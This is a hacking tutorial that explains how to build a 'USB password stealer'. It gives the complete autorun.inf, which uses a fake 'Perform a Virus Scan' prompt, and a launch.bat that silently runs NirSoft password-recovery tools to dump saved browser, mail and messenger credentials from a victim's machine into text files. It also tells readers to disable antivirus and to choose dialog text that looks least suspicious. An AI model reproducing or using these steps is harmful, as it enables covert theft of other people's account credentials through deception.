USB Password Stealer
-----------------------------------
There's a lot of people in the world and
even more online accounts. Every
security system has a flaw and what
we're going to discuss here is just that.
Most people, with their eyes on the clock and not a second to spare just tick "Remember Me" on various websites without a second thought thinking it's going to save their time. This is particularly common among poeple who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password.
Not knowing that there exist many tools
to "recover" saved passwords (More
like- to exploit exactly these naive
people). Browsers store passwords and
account details in cookies. What's quite
surprising is just how little security they
offer, even worse, none of the browsers
seem to care about encrypting
passwords. Most of them have an option
to "Show Saved Paswords" in the options
menu. We're going to cut even that out,
just plug in a USB- Take it out- and
Voila! we have all the passwords. That is
what you'll learn in this tutorial. So,
with a goal in mind and not a second to
spare, let's start right away.
Things you will need (See link below):-
1-MessenPass - MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.
2-Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
3-IE Passview - IE passview is another
small program that helps us view stored passwords in Internet explorer.
4-Protected storage pass viewer(PSPV)- Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
5-Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
(These are the ones I've tried and tested. More like these
surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/ )
So that's that and now we are ready to
create a USB password stealer.
Note: These programs tend to attract a lot of attention from antivirus
softwares (Get used to this). Kindly
disable your antivirus before performing these steps, at your own risk of
course ;-)
1. First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen drive. Make sure you have all the installation files in your USB[if any])
2. Create a new Notepad and write the
following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write
the following text onto it. (Yep, still no
copy-pasting allowed.)
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your
USB drive.
These were simple commands to start up our password "recovering" programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files.
Now your USB password stealer is ready.
All you have to do is insert it in your
victims computer and a popup will
appear, in the popup window select the
option (Perform a virus scan) as soon as you will click it, your USB password
stealer will do it's magic and all the
passwords saved on the system will be
saved in a .txt file. I recommend you try it out on your own system first to see how it should work.
See the last line of our autorun.inf, we
are simply specifying the text for the
alert dialog. You can type in anything
you think is the least suspicious.
This may not work on all operating
systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance.
NOTE-The computer should not have autorun feature disabled for the USB stealer to work.
